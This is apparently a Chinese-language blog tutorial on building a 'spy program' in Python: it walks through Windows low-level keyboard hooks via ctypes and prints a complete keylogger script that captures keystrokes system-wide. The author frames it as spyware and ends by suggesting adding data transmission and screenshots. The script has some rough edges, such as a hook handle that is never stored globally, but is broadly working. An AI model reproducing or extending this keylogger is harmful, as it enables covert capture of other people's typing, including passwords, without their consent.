使用Python打造一款間諜程式
知識點
這次我們使用python來打造一款間諜程式
程式中會用到許多知識點,大致分為四塊
win32API 此處可以在MSDN上檢視
Python基礎重點在cpytes庫的使用,使用方法請點選此處
C語言基礎
Hook
程式的基本原理在於通過註冊Hook,記錄系統事件
那麼什麼是Hook呢
Hook 技術又叫做鉤子函式,系統在呼叫函式之前,鉤子程式就先捕獲該訊息,鉤子函式先得到控制權,這時鉤子函式既可以加工處理(改變)該函式的執行行為,還可以強制結束訊息的傳遞
註冊Hook時我們需要先匯入DLL庫,在Python中我們使用ctypes來匯入,匯入方法如下
user32 = CDLL("user32.dll") kernel32 = CDLL("kernel32.dll")
我們匯入了user32.dll和kernel32.dll
這兩個DLL有什麼用處呢
user32.dll 是Windows使用者介面相關應用程式介面,用於包括Windows處理,基本使用者介面等特性,如建立視窗和傳送訊息
kernel32.dll 控制著系統的記憶體管理、資料的輸入輸出操作和中斷處理
流程部分
知道了我們要使用什麼樣的工具,那麼第一步應該怎麼做呢
1.首先我們需要先註冊Hook到系統上,通過user32.dll中的SetWindowsHookExA函式,我們可以在系統上註冊鉤子
HHOOK SetWindowsHookExA( int idHook, HOOKPROC lpfn, HINSTANCE hmod, DWORD dwThreadId );
通過檢視文件我們看到SetWindowsHookExA函式的引數及引數型別如上所示,詳細文件點選此連結檢視
通過文件我們看到第一個引數idHook中填入鉤子的型別
WH_KEYBOARD_LL的常量值為13代表的意思是監視低階鍵盤輸入事件,我們此處來監聽鍵盤事件
第二個引數lpfn代表指向鉤子過程的指標,要填入鉤子過程(函式),我們可以在此處來新增額外程式碼達到我們想要達成的目的
第三個引數hmod表示為DLL控制代碼,我們可以使用kernel32中的GetModuleHandleW來獲取控制代碼
最後一個引數dwThreadId我們填入0代表與同一桌面上所有的執行緒關聯
程式碼如下
user32.SetWindowsHookExA(13,handleProc,kernel32.GetModuleHandleW(),0)
如何使用Python來編寫我們的鉤子過程呢,通過ctypes文件我們可以得知windows下使用WINFUNCTYPE來建立函式
此時我們發現有WINFUNCTYPE和CFUNCTYPE兩個函式,具體要使用哪一個呢,這兩個的區別為
WINFUNCTYPE 為Windows下獨有的,通過使用使用stdcall呼叫約定的函式
CFUNCTYPE 使用標準C呼叫約定的函式
HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD))
因為我們呼叫的是WH_KEYBOARD_LL,WH_KEYBOARD_LL會使用LowLevelKeyboardProc回撥函式,同時我們也需要在Python定義它
LowLevelKeyboardProc資料結構如下
LRESULT CALLBACK LowLevelKeyboardProc( _In_ int nCode, _In_ WPARAM wParam, _In_ LPARAM lParam );
按照官方文件提示 如果nCode小於零,則掛鉤過程必須將訊息傳遞給CallNextHookEx函式,而無需進一步處理,並且應返回CallNextHookEx返回的值
我們轉換為Python程式碼
class KBDLLHOOKSTRUCT(Structure): _fields_ = [ ('vkCode', DWORD), ('scanCode', DWORD), ('flags', DWORD), ('time', DWORD), ('dwExtraInfo', DWORD)] def hookProc(nCode, wParam, lParam): if nCode < 0: return user32.CallNextHookEx(hooked, nCode, wParam, lParam) else:
# 此處插入我們的程式碼 pass return user32.CallNextHookEx(hooked, nCode, wParam, lParam)
最後在我們退出程式時還需要刪除Hook,不然大量的Hook會使系統執行緩慢,雖然在Windows 7及更高版本上,該鉤子會被靜默刪除而不被呼叫。應用程式無法知道掛鉤是否已刪除。我們還是主動進行刪除
刪除需要使用user32.dll的UnhookWindowsHookEx,引數為Hook控制代碼
user32.UnhookWindowsHookEx(hooked)
下面貼上全部程式碼
1 import sys 2 from ctypes import * 3 from ctypes.wintypes import DWORD, HHOOK, HINSTANCE, MSG, WPARAM, LPARAM 4 5 user32 = CDLL("user32.dll") 6 kernel32 = CDLL("kernel32.dll") 7 8 9 class KBDLLHOOKSTRUCT(Structure): 10 _fields_ = [ 11 ('vkCode', DWORD), 12 ('scanCode', DWORD), 13 ('flags', DWORD), 14 ('time', DWORD), 15 ('dwExtraInfo', DWORD)] 16 17 18 def uninstallHookProc(hooked): 19 if hooked is None: 20 return 21 user32.UnhookWindowsHookEx(hooked) 22 hooked = None 23 24 25 def hookProc(nCode, wParam, lParam): 26 if nCode < 0: 27 return user32.CallNextHookEx(hooked, nCode, wParam, lParam) 28 else: 29 if wParam == 256: 30 if 162 == lParam.contents.value: 31 print("Ctrl pressed, call Hook uninstall()") 32 uninstallHookProc(hooked) 33 sys.exit(-1) 34 capsLock = user32.GetKeyState(20) 35 # kb_struct = cast(lParam, POINTER(KBDLLHOOKSTRUCT)) 36 if lParam.contents.value==13: 37 print("\n") 38 elif capsLock: 39 print(chr(lParam.contents.value),end="") 40 else: 41 print(chr(lParam.contents.value+32),end="") 42 return user32.CallNextHookEx(hooked, nCode, wParam, lParam) 43 44 45 def startKeyLog(): 46 msg = MSG() 47 user32.GetMessageA(byref(msg), 0, 0, 0) 48 49 50 def installHookProc(hooked, pointer): 51 hooked = user32.SetWindowsHookExA( 52 13, 53 pointer, 54 kernel32.GetModuleHandleW(), 55 0 56 ) 57 if not hooked: 58 return False 59 return True 60 61 62 HOOKPROC = WINFUNCTYPE(c_int, c_int, c_int, POINTER(DWORD)) 63 pointer = HOOKPROC(hookProc) 64 hooked = None 65 if installHookProc(hooked, pointer): 66 print("Hook installed") 67 try: 68 msg = MSG() 69 user32.GetMessageA(byref(msg), 0, 0, 0) 70 except KeyboardInterrupt as kerror: 71 uninstallHookProc(hooked) 72 print("Hook uninstall...") 73 else: 74 print("Hook installed error")
貼上我們的效果圖
我們還可以再新增上額外的程式碼比如資料傳輸,截圖等等 ^_^
如何想要了解更多的只是請點選這裡把 => 地址
轉載請附上原文出處連結及本